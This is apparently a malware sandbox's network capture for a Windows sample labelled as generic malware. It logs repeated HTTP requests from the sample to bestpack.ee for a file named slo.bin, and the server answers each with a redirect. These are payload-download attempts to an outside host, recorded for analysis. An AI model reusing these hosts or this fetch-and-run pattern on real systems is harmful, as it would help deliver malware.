                                                                                                                      Sep 27, 2024 19:00:30.120770931 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:00:30.342278957 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:30 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.11.2049780185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:00:41.539582968 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:00:41.760488033 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:41 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.11.2049782185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:00:52.924864054 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:00:53.142752886 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:53 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.11.2049784185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:01:04.328171015 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:01:04.545500040 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:04 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.11.2049786185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:01:15.705539942 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:01:15.928312063 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:15 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.11.2049788185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:01:27.125247002 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:01:27.348969936 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:27 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.11.2049790185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:01:38.508802891 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:01:38.729651928 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:38 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.11.2049792185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:01:49.900963068 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:01:50.123106956 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:50 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.11.2049794185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:02:01.238559008 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:02:01.456110001 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:01 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.11.2049796185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:02:12.563296080 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:02:12.780922890 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:12 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.11.2049798185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:02:23.909811020 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:02:24.132325888 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:24 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.11.2049800185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:02:35.251364946 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:02:35.473625898 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:35 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.11.2049802185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:02:46.588013887 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:02:46.806739092 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:46 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
